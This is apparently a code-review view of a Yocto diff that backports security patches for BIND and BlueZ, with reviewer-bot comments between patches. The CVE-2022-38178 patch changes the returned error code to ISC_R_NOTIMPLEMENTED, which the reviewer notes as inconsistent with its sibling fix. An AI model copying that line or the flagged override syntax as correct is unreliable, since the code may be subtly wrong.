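+query next) by setting a hard limit on the number of NS RRs processed
+for any delegation encountered. Without any limit in place, named can
+be forced to perform large amounts of database lookups per each query
+received, which severely impacts resolver performance.
+
+The limit used (20) is an arbitrary value that is considered to be big
+enough for any sane DNS delegation.
+
+(cherry picked from commit 3a44097fd6c6c260765b628cd1d2c9cb7efb0b2a)
+
+Upstream-Status: Backport
+CVE: CVE-2022-2795
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/bf2ea6d8525bfd96a84dad221ba9e004adb710a8
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/resolver.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/lib/dns/resolver.c b/lib/dns/resolver.c
+index 8ae9a993bbd7..ac9a9ef5d009 100644
+--- a/lib/dns/resolver.c
++++ b/lib/dns/resolver.c
+@@ -180,6 +180,12 @@
+ */
+ #define NS_FAIL_LIMIT 4
+ #define NS_RR_LIMIT 5
++/*
++ * IP address lookups are performed for at most NS_PROCESSING_LIMIT NS RRs in
++ * any NS RRset encountered, to avoid excessive resource use while processing
++ * large delegations.
++ */
++#define NS_PROCESSING_LIMIT 20
+
+ /* Number of hash buckets for zone counters */
+ #ifndef RES_DOMAIN_BUCKETS
+@@ -3318,6 +3324,7 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+ bool need_alternate = false;
+ bool all_spilled = true;
+ unsigned int no_addresses = 0;
++ unsigned int ns_processed = 0;
+
+ FCTXTRACE5("getaddresses", "fctx->depth=", fctx->depth);
+
+@@ -3504,6 +3511,11 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
+
+ dns_rdata_reset(&rdata);
+ dns_rdata_freestruct(&ns);
++
++ if (++ns_processed >= NS_PROCESSING_LIMIT) {
++ result = ISC_R_NOMORE;
++ break;
++ }
+ }
+ if (result != ISC_R_NOMORE) {
+ return (result);
+--
+2.34.1
+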
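Review bot: Reaching NS_PROCESSING_LIMIT in the loop of fctx_getaddresses is silent: setting `result = ISC_R_NOMORE` before the `break` makes a truncated delegation indistinguishable from one that simply ran out of NS records, so an operator investigating odd resolution gets no signal that name servers were skipped. A trace line ahead of the `break`, for example `FCTXTRACE("NS processing limit reached");`, would make the cut-off visible. The new `#define NS_PROCESSING_LIMIT 20` could also be wrapped in `#ifndef`, as RES_DOMAIN_BUCKETS is just below it, so a builder can tune the bound without patching. The function body starts and ends outside the hunks.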
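--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
@@ -0,0 +1,31 @@
+From ef3d1a84ff807eea27b4fef601a15932c5ffbfbf Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:15:34 +1000
+Subject: [PATCH 2/3] Free eckey on siglen mismatch
+
+Upstream-Status: Backport
+CVE: CVE-2022-38177
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/5b2282afff760b1ed3471f6666bdfe8e1d34e590
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/opensslecdsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/opensslecdsa_link.c b/lib/dns/opensslecdsa_link.c
+index 83b5b51cd78c..7576e04ac635 100644
+--- a/lib/dns/opensslecdsa_link.c
++++ b/lib/dns/opensslecdsa_link.c
+@@ -224,7 +224,7 @@ opensslecdsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ siglen = DNS_SIG_ECDSA384SIZE;
+
+ if (sig->length != siglen)
+- return (DST_R_VERIFYFAILURE);
++ DST_RET(DST_R_VERIFYFAILURE);
+
+ if (!EVP_DigestFinal_ex(evp_md_ctx, digest, &dgstlen))
+ DST_RET (dst__openssl_toresult3(dctx->category,
+--
+2.34.1
+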
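--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
@@ -0,0 +1,33 @@
+From 65f5b2f0162d5d2ab25f463aa14a8bae71ace3d9 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Thu, 11 Aug 2022 15:28:13 +1000
+Subject: [PATCH 3/3] Free ctx on invalid siglen
+
+(cherry picked from commit 6ddb480a84836641a0711768a94122972c166825)
+
+Upstream-Status: Backport
+CVE: CVE-2022-38178
+Reference to upstream patch:
+https://gitlab.isc.org/isc-projects/bind9/-/commit/1af23378ebb11da2eb0f412e4563d6
+
+Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
+---
+ lib/dns/openssleddsa_link.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/dns/openssleddsa_link.c b/lib/dns/openssleddsa_link.c
+index 8b115ec283f0..b4fcd607c131 100644
+--- a/lib/dns/openssleddsa_link.c
++++ b/lib/dns/openssleddsa_link.c
+@@ -325,7 +325,7 @@ openssleddsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
+ siglen = DNS_SIG_ED448SIZE;
+
+ if (sig->length != siglen)
+- return (DST_R_VERIFYFAILURE);
++ DST_RET(ISC_R_NOTIMPLEMENTED);
+
+ isc_buffer_usedregion(buf, &tbsreg);
+
+--
+2.34.1
+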
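Review bot: The changed line in openssleddsa_verify alters more than the exit path: besides routing through `DST_RET` so the context is released, it replaces `DST_R_VERIFYFAILURE` with `ISC_R_NOTIMPLEMENTED`, which the subject line ("Free ctx on invalid siglen") does not mention and which differs from the sibling ECDSA fix in CVE-2022-38177.patch, where the result stays `DST_R_VERIFYFAILURE`. A signature of the wrong length is a failed verification, and callers may handle a "not implemented" result differently from a verification failure (their handling is not visible here). Unless the new code is deliberate and matches the referenced upstream commit, the line should read `DST_RET(DST_R_VERIFYFAILURE);`. The cleanup label that DST_RET presumably jumps to is outside the hunk.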
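--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
@@ -0,0 +1,166 @@
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/b/bind9/bind9_9.11.5.P4+dfsg-5.1+deb10u9.debian.tar.xz
+Upstream patch https://downloads.isc.org/isc/bind9/9.16.42/patches/0001-CVE-2023-2828.patch]
+Upstream Commit: https://github.com/isc-projects/bind9/commit/da0eafcdee52147e72d407cc3b9f179378ee1d3a
+CVE: CVE-2023-2828
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+
+---
+ lib/dns/rbtdb.c | 106 +++++++++++++++++++++++++++++++++-----------------------
+ 1 file changed, 63 insertions(+), 43 deletions(-)
+
+diff --git a/lib/dns/rbtdb.c b/lib/dns/rbtdb.c
+index b1b928c..3165e26 100644
+--- a/lib/dns/rbtdb.c
++++ b/lib/dns/rbtdb.c
+@@ -792,7 +792,7 @@ static void update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ static void expire_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ bool tree_locked, expire_t reason);
+ static void overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+- isc_stdtime_t now, bool tree_locked);
++ size_t purgesize, bool tree_locked);
+ static isc_result_t resign_insert(dns_rbtdb_t *rbtdb, int idx,
+ rdatasetheader_t *newheader);
+ static void resign_delete(dns_rbtdb_t *rbtdb, rbtdb_version_t *version,
+@@ -6784,6 +6784,16 @@ addclosest(dns_rbtdb_t *rbtdb, rdatasetheader_t *newheader,
+
+ static dns_dbmethods_t zone_methods;
+
++static size_t
++rdataset_size(rdatasetheader_t *header) {
++ if (!NONEXISTENT(header)) {
++ return (dns_rdataslab_size((unsigned char *)header,
++ sizeof(*header)));
++ }
++
++ return (sizeof(*header));
++}
++
+ static isc_result_t
+ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ isc_stdtime_t now, dns_rdataset_t *rdataset, unsigned int options,
+@@ -6932,7 +6942,8 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ }
+
+ if (cache_is_overmem)
+- overmem_purge(rbtdb, rbtnode->locknum, now, tree_locked);
++ overmem_purge(rbtdb, rbtnode->locknum, rdataset_size(newheader),
++ tree_locked);
+
+ NODE_LOCK(&rbtdb->node_locks[rbtnode->locknum].lock,
+ isc_rwlocktype_write);
+@@ -6947,9 +6958,14 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
+ cleanup_dead_nodes(rbtdb, rbtnode->locknum);
+
+ header = isc_heap_element(rbtdb->heaps[rbtnode->locknum], 1);
+- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL)
+- expire_header(rbtdb, header, tree_locked,
+- expire_ttl);
++ if (header != NULL) {
++ dns_ttl_t rdh_ttl = header->rdh_ttl;
++
++ if (rdh_ttl < now - RBTDB_VIRTUAL) {
++ expire_header(rbtdb, header, tree_locked,
++ expire_ttl);
++ }
++ }
+
+ /*
+ * If we've been holding a write lock on the tree just for
+@@ -10388,54 +10404,58 @@ update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
+ ISC_LIST_PREPEND(rbtdb->rdatasets[header->node->locknum], header, link);
+ }
+
++static size_t
++expire_lru_headers(dns_rbtdb_t *rbtdb, unsigned int locknum, size_t purgesize,
++ bool tree_locked) {
++ rdatasetheader_t *header, *header_prev;
++ size_t purged = 0;
++
++ for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
++ header != NULL && purged <= purgesize; header = header_prev)
++ {
++ header_prev = ISC_LIST_PREV(header, link);
++ /*
++ * Unlink the entry at this point to avoid checking it
++ * again even if it's currently used someone else and
++ * cannot be purged at this moment. This entry won't be
++ * referenced any more (so unlinking is safe) since the
++ * TTL was reset to 0.
++ */
++ ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header, link);
++ size_t header_size = rdataset_size(header);
++ expire_header(rbtdb, header, tree_locked, expire_lru);
++ purged += header_size;
++ }
++
++ return (purged);
++}
++
+ /*%
+- * Purge some expired and/or stale (i.e. unused for some period) cache entries
+- * under an overmem condition. To recover from this condition quickly, up to
+- * 2 entries will be purged. This process is triggered while adding a new
+- * entry, and we specifically avoid purging entries in the same LRU bucket as
+- * the one to which the new entry will belong. Otherwise, we might purge
+- * entries of the same name of different RR types while adding RRsets from a
+- * single response (consider the case where we're adding A and AAAA glue records
+- * of the same NS name).
+- */
++ * Purge some stale (i.e. unused for some period - LRU based cleaning) cache
++ * entries under the overmem condition. To recover from this condition quickly,
++ * we cleanup entries up to the size of newly added rdata (passed as purgesize).
++ *
++ * This process is triggered while adding a new entry, and we specifically avoid
++ * purging entries in the same LRU bucket as the one to which the new entry will
++ * belong. Otherwise, we might purge entries of the same name of different RR
++ * types while adding RRsets from a single response (consider the case where
++ * we're adding A and AAAA glue records of the same NS name).
++*/
+ static void
+-overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
+- isc_stdtime_t now, bool tree_locked)
++overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start, size_t purgesize,
++ bool tree_locked)
+ {
+- rdatasetheader_t *header, *header_prev;
+ unsigned int locknum;
+- int purgecount = 2;
++ size_t purged = 0;
+
+ for (locknum = (locknum_start + 1) % rbtdb->node_lock_count;
+- locknum != locknum_start && purgecount > 0;
++ locknum != locknum_start && purged <= purgesize;
+ locknum = (locknum + 1) % rbtdb->node_lock_count) {
+ NODE_LOCK(&rbtdb->node_locks[locknum].lock,
+ isc_rwlocktype_write);
+
+- header = isc_heap_element(rbtdb->heaps[locknum], 1);
+- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL) {
+- expire_header(rbtdb, header, tree_locked,
+- expire_ttl);
+- purgecount--;
+- }
+-
+- for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
+- header != NULL && purgecount > 0;
+- header = header_prev) {
+- header_prev = ISC_LIST_PREV(header, link);
+- /*
+- * Unlink the entry at this point to avoid checking it
+- * again even if it's currently used someone else and
+- * cannot be purged at this moment. This entry won't be
+- * referenced any more (so unlinking is safe) since the
+- * TTL was reset to 0.
+- */
+- ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header,
+- link);
+- expire_header(rbtdb, header, tree_locked,
+- expire_lru);
+- purgecount--;
+- }
++ purged += expire_lru_headers(rbtdb, locknum, purgesize - purged,
++ tree_locked);
+
+ NODE_UNLOCK(&rbtdb->node_locks[locknum].lock,
+ isc_rwlocktype_write);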
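Review bot: The new helper expire_lru_headers has no header comment, and its contract is not obvious from the body: it walks and unlinks entries of `rbtdb->rdatasets[locknum]`, so it depends on the caller holding the write lock for that bucket, as overmem_purge does with NODE_LOCK/NODE_UNLOCK around the call. A short comment above it should state that precondition and that the return value is the number of bytes expired, as measured by rdataset_size. The loop condition `purged <= purgesize` (here and in overmem_purge) keeps going when the target has been met exactly; if freeing strictly more than was added is the intent, the comment should say so. `size_t header_size` is declared after a statement inside the loop, which is worth checking against the C dialect this BIND branch is built with.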
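--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
@@ -0,0 +1,175 @@
+From c4fac5ca98efd02fbaef43601627c7a3a09f5a71 Mon Sep 17 00:00:00 2001
+From: Mark Andrews <marka@isc.org>
+Date: Tue, 20 Jun 2023 15:21:36 +1000
+Subject: [PATCH] Limit isccc_cc_fromwire recursion depth
+
+Named and rndc do not need a lot of recursion so the depth is
+set to 10.
+
+Taken from BIND 9.16.44 change.
+
+Upstream-Status: Backport [https://gitlab.isc.org/isc-projects/bind9/-/commit/c4fac5ca98efd02fbaef43601627c7a3a09f5a71]
+CVE: CVE-2023-3341
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/isccc/cc.c | 38 +++++++++++++++++++++++---------
+ lib/isccc/include/isccc/result.h | 4 +++-
+ lib/isccc/result.c | 4 +++-
+ 3 files changed, 34 insertions(+), 12 deletions(-)
+
+diff --git a/lib/isccc/cc.c b/lib/isccc/cc.c
+index e012685..8eac3d6 100644
+--- a/lib/isccc/cc.c
++++ b/lib/isccc/cc.c
+@@ -53,6 +53,10 @@
+
+ #define MAX_TAGS 256
+ #define DUP_LIFETIME 900
++#ifndef ISCCC_MAXDEPTH
++#define ISCCC_MAXDEPTH \
++ 10 /* Big enough for rndc which just sends a string each way. */
++#endif
+
+ typedef isccc_sexpr_t *sexpr_ptr;
+
+@@ -561,19 +565,25 @@ verify(isccc_sexpr_t *alist, unsigned char *data, unsigned int length,
+
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+- uint32_t algorithm, isccc_sexpr_t **alistp);
++ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp);
+
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp);
++list_fromwire(isccc_region_t *source, unsigned int depth,
++ isccc_sexpr_t **listp);
+
+ static isc_result_t
+-value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
++value_fromwire(isccc_region_t *source, unsigned int depth,
++ isccc_sexpr_t **valuep) {
+ unsigned int msgtype;
+ uint32_t len;
+ isccc_sexpr_t *value;
+ isccc_region_t active;
+ isc_result_t result;
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ if (REGION_SIZE(*source) < 1 + 4)
+ return (ISC_R_UNEXPECTEDEND);
+ GET8(msgtype, source->rstart);
+@@ -591,9 +601,9 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+ } else
+ result = ISC_R_NOMEMORY;
+ } else if (msgtype == ISCCC_CCMSGTYPE_TABLE)
+- result = table_fromwire(&active, NULL, 0, valuep);
++ result = table_fromwire(&active, NULL, 0, depth + 1, valuep);
+ else if (msgtype == ISCCC_CCMSGTYPE_LIST)
+- result = list_fromwire(&active, valuep);
++ result = list_fromwire(&active, depth + 1, valuep);
+ else
+ result = ISCCC_R_SYNTAX;
+
+@@ -602,7 +612,7 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
+
+ static isc_result_t
+ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+- uint32_t algorithm, isccc_sexpr_t **alistp)
++ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp)
+ {
+ char key[256];
+ uint32_t len;
+@@ -613,6 +623,10 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+
+ REQUIRE(alistp != NULL && *alistp == NULL);
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ checksum_rstart = NULL;
+ first_tag = true;
+ alist = isccc_alist_create();
+@@ -628,7 +642,7 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ GET_MEM(key, len, source->rstart);
+ key[len] = '\0'; /* Ensure NUL termination. */
+ value = NULL;
+- result = value_fromwire(source, &value);
++ result = value_fromwire(source, depth + 1, &value);
+ if (result != ISC_R_SUCCESS)
+ goto bad;
+ if (isccc_alist_define(alist, key, value) == NULL) {
+@@ -661,14 +675,18 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ }
+
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp) {
++list_fromwire(isccc_region_t *source, unsigned int depth, isccc_sexpr_t **listp) {
+ isccc_sexpr_t *list, *value;
+ isc_result_t result;
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ list = NULL;
+ while (!REGION_EMPTY(*source)) {
+ value = NULL;
+- result = value_fromwire(source, &value);
++ result = value_fromwire(source, depth + 1, &value);
+ if (result != ISC_R_SUCCESS) {
+ isccc_sexpr_free(&list);
+ return (result);
+@@ -699,7 +717,7 @@ isccc_cc_fromwire(isccc_region_t *source, isccc_sexpr_t **alistp,
+ if (version != 1)
+ return (ISCCC_R_UNKNOWNVERSION);
+
+- return (table_fromwire(source, secret, algorithm, alistp));
++ return (table_fromwire(source, secret, algorithm, 0, alistp));
+ }
+
+ static isc_result_t
+diff --git a/lib/isccc/include/isccc/result.h b/lib/isccc/include/isccc/result.h
+index 6c79dd7..a85861c 100644
+--- a/lib/isccc/include/isccc/result.h
++++ b/lib/isccc/include/isccc/result.h
+@@ -47,8 +47,10 @@
+ #define ISCCC_R_CLOCKSKEW (ISC_RESULTCLASS_ISCCC + 4)
+ /*% Duplicate */
+ #define ISCCC_R_DUPLICATE (ISC_RESULTCLASS_ISCCC + 5)
++/*% Maximum recursion depth */
++#define ISCCC_R_MAXDEPTH (ISC_RESULTCLASS_ISCCC + 6)
+
+-#define ISCCC_R_NRESULTS 6 /*%< Number of results */
++#define ISCCC_R_NRESULTS 7 /*%< Number of results */
+
+ ISC_LANG_BEGINDECLS
+
+diff --git a/lib/isccc/result.c b/lib/isccc/result.c
+index 8419bbb..325200b 100644
+--- a/lib/isccc/result.c
++++ b/lib/isccc/result.c
+@@ -40,7 +40,8 @@ static const char *text[ISCCC_R_NRESULTS] = {
+ "bad auth", /* 3 */
+ "expired", /* 4 */
+ "clock skew", /* 5 */
+- "duplicate" /* 6 */
++ "duplicate", /* 6 */
++ "max depth", /* 7 */
+ };
+
+ static const char *ids[ISCCC_R_NRESULTS] = {
+@@ -50,6 +51,7 @@ static const char *ids[ISCCC_R_NRESULTS] = {
+ "ISCCC_R_EXPIRED",
+ "ISCCC_R_CLOCKSKEW",
+ "ISCCC_R_DUPLICATE",
++ "ISCCC_R_MAXDEPTH",
+ };
+
+ #define ISCCC_RESULT_RESULTSET 2
+--
+2.25.1
+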
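Review bot: ISCCC_MAXDEPTH does not bound container nesting at 10, as the commit message and the comment on the define suggest: value_fromwire passes `depth + 1` into table_fromwire and list_fromwire, and those pass `depth + 1` again into value_fromwire, so every nested table or list consumes two levels and `depth > ISCCC_MAXDEPTH` trips after roughly half that many containers. The bound is still safe against unbounded recursion on a control-channel message, but a maintainer raising the limit later will get half of what they expect. The comment on the define should say what is counted, for example `/* call depth of the *_fromwire parsers; each nested table or list uses two levels */`. The bodies of table_fromwire and value_fromwire continue outside the hunks.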
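--- a/meta/recipes-connectivity/bind/bind_9.11.22.bb
+++ b/meta/recipes-connectivity/bind/bind_9.11.37.bb
@@ -1,9 +1,10 @@
 SUMMARY = "ISC Internet Domain Name Server"
 HOMEPAGE = "https://www.isc.org/bind/"
+DESCRIPTION = "BIND 9 provides a full-featured Domain Name Server system"
 SECTION = "console/network"
 
 LICENSE = "ISC & BSD"
-LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=bf39058a7f64b2a934ce14dc9ec1dd45"
+LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=89a97ebbf713f7125fe5c02223d3ae95"
 
 DEPENDS = "openssl libcap zlib"
 
@@ -18,9 +19,14 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \
  file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \
  file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \
  file://0001-avoid-start-failure-with-bind-user.patch \
+ file://CVE-2022-2795.patch \
+ file://CVE-2022-38177.patch \
+ file://CVE-2022-38178.patch \
+ file://CVE-2023-2828.patch \
+ file://CVE-2023-3341.patch \
  "
 
-SRC_URI[sha256sum] = "afc6d8015006f1cabf699ff19f517bb8fd9c1811e5231f26baf51c3550262ac9"
+SRC_URI[sha256sum] = "0d8efbe7ec166ada90e46add4267b7e7c934790cba9bd5af6b8380a4fbfb5aff"
 
 UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/"
 # stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4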
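--- a/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
  file://COPYING.LIB;md5=fb504b67c50331fc78734fed90fb0e09 \
  file://src/main.c;beginline=1;endline=24;md5=9bc54b93cd7e17bf03f52513f39f926e"
 DEPENDS = "dbus glib-2.0"
+RDEPENDS:${PN} += "dbus"
 PROVIDES += "bluez-hcidump"
 RPROVIDES_${PN} += "bluez-hcidump"
 
@@ -52,6 +53,13 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
  ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \
  file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
  file://0001-test-gatt-Fix-hung-issue.patch \
+ file://CVE-2021-0129.patch \
+ file://CVE-2021-3588.patch \
+ file://CVE-2021-3658.patch \
+ file://CVE-2022-0204.patch \
+ file://CVE-2022-39176.patch \
+ file://CVE-2022-3637.patch \
+ file://CVE-2023-45866.patch \
  "
 S = "${WORKDIR}/bluez-${PV}"
 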
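Review bot: The added `RDEPENDS:${PN} += "dbus"` in the first hunk uses the colon override syntax, while the line two below it still reads `RPROVIDES_${PN}` with the underscore form. If this branch's BitBake only applies underscore overrides, the new assignment sets a differently named variable and the runtime dependency on dbus never reaches the package. `RDEPENDS_${PN} += "dbus"` would match the rest of the file; checking the expanded value with `bitbake -e bluez5` would confirm which form takes effect.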
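--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
@@ -0,0 +1,109 @@
+From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 2 Mar 2021 11:38:33 -0800
+Subject: shared/gatt-server: Fix not properly checking for secure flags
+
+When passing the mask to check_permissions all valid permissions for
+the operation must be set including BT_ATT_PERM_SECURE flags.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+CVE: CVE-2021-0129
+---
+ src/shared/att-types.h | 8 ++++++++
+ src/shared/gatt-server.c | 25 +++++++------------------
+ 2 files changed, 15 insertions(+), 18 deletions(-)
+
+diff --git a/src/shared/att-types.h b/src/shared/att-types.h
+index 7108b4e94..3adc05d9e 100644
+--- a/src/shared/att-types.h
++++ b/src/shared/att-types.h
+@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp {
+ #define BT_ATT_PERM_WRITE_SECURE 0x0200
+ #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \
+ BT_ATT_PERM_WRITE_SECURE)
++#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \
++ BT_ATT_PERM_READ_AUTHEN | \
++ BT_ATT_PERM_READ_ENCRYPT | \
++ BT_ATT_PERM_READ_SECURE)
++#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \
++ BT_ATT_PERM_WRITE_AUTHEN | \
++ BT_ATT_PERM_WRITE_ENCRYPT | \
++ BT_ATT_PERM_WRITE_SECURE)
+
+ /* GATT Characteristic Properties Bitfield values */
+ #define BT_GATT_CHRC_PROP_BROADCAST 0x01
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index b5f7de7dc..970c35f94 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op)
+ return;
+ }
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan,
+ opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, next_attr,
++ BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+--
+cgit 1.2.3-1.el7
+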
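Review bot: The new `BT_ATT_PERM_READ_MASK` and `BT_ATT_PERM_WRITE_MASK` macros in att-types.h carry no comment saying they must list every permission bit for their direction. The defect being fixed is a set of call sites whose hand-written mask omitted the `_SECURE` bit, so a later permission flag that is not added to these masks would be dropped from `check_permissions()` in the same way. A one-line comment above each, e.g. `/* Every read permission bit; extend when a new BT_ATT_PERM_READ_* flag is added */`, would record that. Whether other `check_permissions()` callers outside these six hunks still build their own mask cannot be seen from here and is worth checking in the patched tree.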
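--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
@@ -0,0 +1,34 @@
+From 3a40bef49305f8327635b81ac8be52a3ca063d5a Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Mon, 4 Jan 2021 10:38:31 -0800
+Subject: [PATCH] gatt: Fix potential buffer out-of-bound
+
+When client features is read check if the offset is within the cli_feat
+bounds.
+
+Fixes: https://github.com/bluez/bluez/issues/70
+
++Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=3a40bef49305f8327635b81ac8be52a3ca063d5a]
++Signed-off-by: Steve Sakoman <steve@sakoman.com>
++CVE: CVE-2021-3588
+
+---
+ src/gatt-database.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/gatt-database.c b/src/gatt-database.c
+index 90cc4bade..f2d7b5821 100644
+--- a/src/gatt-database.c
++++ b/src/gatt-database.c
+@@ -1075,6 +1075,11 @@ static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
+ goto done;
+ }
+
++ if (offset >= sizeof(state->cli_feat)) {
++ ecode = BT_ATT_ERROR_INVALID_OFFSET;
++ goto done;
++ }
++
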